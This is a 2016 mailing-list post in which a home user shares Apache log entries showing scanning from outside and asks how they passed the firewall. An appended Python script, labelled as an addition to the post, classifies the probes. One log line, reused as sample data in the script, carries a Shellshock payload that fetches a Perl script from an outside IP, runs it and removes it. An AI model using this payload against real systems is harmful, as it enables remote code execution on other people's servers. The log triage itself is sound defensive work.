[lug] Apache requests (to webdav) behind firewall?!

Bear Giles bgiles at coyotesong.com
Mon Nov 14 22:00:44 MST 2016


I was looking for something else and was shocked to see there are requests
in my Apache logs on my home system - behind a firewall that isn't supposed
to be doing port forwarding!

164.132.201.51 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"
212.92.127.143 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
23.247.72.43 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
164.132.201.51 - - [13/Nov/2016:12:39:32 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"
212.92.127.29 - - [13/Nov/2016:14:21:52 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c \"wget -O /tmp/.nova.txt 93.158.203.136/style.css; curl -o /tmp/.nova.txt 93.158.203.136/style.css; perl /tmp/.nova.txt; rm -rf /tmp/.nova.txt\""
141.212.122.128 - - [13/Nov/2016:14:26:01 -0700] "GET /x HTTP/1.1" 400 0 "-" "Telesphoreo"
192.99.144.140 - - [13/Nov/2016:14:54:49 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"

There are obviously probes - but how did they get into the system? Via
malicious javascript that's getting past my filters? Something else? The
'wget' entry is particularly disturbing since it clearly recognizes that
I'm running Linux.
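As an added example (not part of the original post), a small Python triage script that parses the Apache combined-format entries quoted above and tags the three probe patterns they contain: PROPFIND against /webdav/, the self-identifying masscan user agent, and the Shellshock-style Bash function definition carried in the User-Agent header. The sample entries are copied from the post and rejoined onto single lines; the tag names and thresholds are my own.

```python
import re

# Apache combined log format, one request per line (the mail client wrapped the posted lines mid-entry).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# Bash function-definition prefix that Shellshock probes place in request headers (here, User-Agent).
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')

# Sample entries copied from the post above, each rejoined onto a single line.
SAMPLE_LOG = r'''164.132.201.51 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"
212.92.127.143 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
23.247.72.43 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
212.92.127.29 - - [13/Nov/2016:14:21:52 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c \"wget -O /tmp/.nova.txt 93.158.203.136/style.css; curl -o /tmp/.nova.txt 93.158.203.136/style.css; perl /tmp/.nova.txt; rm -rf /tmp/.nova.txt\""
192.99.144.140 - - [13/Nov/2016:14:54:49 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"
'''

def parse_line(line):
    """Return a dict of the named fields, or None when the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Tag one parsed entry; an empty list means nothing in it looked like a probe."""
    tags = []
    if entry["method"] == "PROPFIND" and entry["path"].startswith("/webdav"):
        tags.append("webdav-probe")        # the 405 reply means Apache refused the method: no WebDAV here
    if "masscan" in entry["ua"].lower():
        tags.append("mass-scanner")        # Internet-wide port scanner that announces itself
    if SHELLSHOCK_RE.search(entry["ua"]) or SHELLSHOCK_RE.search(entry["referer"]):
        tags.append("shellshock-attempt")  # aimed at a CGI script; the 404 means nothing executed
    return tags

def scan(log_text):
    """Map each source IP to the set of probe tags seen from it; unflagged requests are omitted."""
    findings = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for tag in classify(entry):
            findings.setdefault(entry["ip"], set()).add(tag)
    return findings

if __name__ == "__main__":
    for ip, tags in sorted(scan(SAMPLE_LOG).items()):
        print(f"{ip:16} {', '.join(sorted(tags))}")
```

Run against the full access log, the output lists only the sources whose requests matched a probe pattern; the ordinary-looking MSIE request is left out, which is what one wants from a first pass before looking at what the firewall is actually forwarding.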